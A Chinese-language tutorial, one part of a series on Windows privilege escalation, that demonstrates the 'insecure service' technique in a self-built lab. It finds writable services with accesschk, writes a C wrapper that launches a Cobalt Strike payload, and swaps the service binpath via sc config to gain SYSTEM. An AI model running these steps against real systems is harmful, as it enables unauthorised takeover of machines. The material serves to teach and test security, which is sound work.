系列文章

操作系统权限提升(一)之操作系统权限介绍
操作系统权限提升(二)之常见提权的环境介绍
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
操作系统权限提升(五)之系统错误配置-PATH环境变量提权

注：阅读本编文章前，请先阅读系列文章，以免造成看不懂的情况！！

不安全的服务提权

不安全的服务提权原理

通常 Windows服务都是以 System权限运行的,当由于系统管理员错误配置导致低权限用户可以对某些服务修改时,可以通过修改服务启动文件的路径“ binpath”,将其替换为恶意程序的路径,这样服务启动时便会运行恶意程序

如何因为配置不当就可以替换执行文件的路径，导致提权

提权环境准备

1、先建一个服务，名字为qianfu，运行C盘下的1.exe

sc create qianfu binpath= "C:\1.exe"

2、使用subinacl给服务设置权限

subinacl /service qianfu /grant=apache=F

不安全的服务提权实战

1、首先先用MS或者CS控制目标靶机

2、这里借助 Access Chk工具快速发现配置不当的服务,下面先简单介绍这个工具。通过 AccessChk可以了解特定用户或组对资源的访问权限,包括文件、目录、注册表项、全局对象和 Windows服务

用法介绍	命令
查看用户/用户组对文件文件夹的权限	accesschk 用户/用户组文件件夹
列出所有服务的权限	accesschk.exe -ucqv *
查看用户/用户组具有写权限的服务	accesschk用户/用户组 -cw *
要查看用户/用户组对 HKEY LOCAL MACHINE、Software目录下注册表项的权限	accesschk-k用户/用户组 hkl\software
查看每个人都可以修改的全局对象	accesschk -wuo everyone \

我们把这个工具上传到目标机器上去

accesschk -cw * /accepteula

可以看到apache拥有RW权限

3、查看恶意上传的cs恶意程序文件路劲，并记录下来

4、制作恶意程序，将恶意的文件替换上去

#include <stdio.h>
#include <stdlib.h>
int main(){system("cmd.exe /c C:\\Users\\apache\\Desktop\\1.exe");return 0;
}

将我们的恶意文件上传到目标机器上去

5、更改qianfu服务的启动文件，替换成恶意的文件然后提权

sc config qianfu binpath= "C:\Users\apache\Desktop\521.exe"

我们可以通过命令查看当前服务执行的是哪些命令

sc qc qianfu

6、手动启动服务，提权成功

sc start qianfu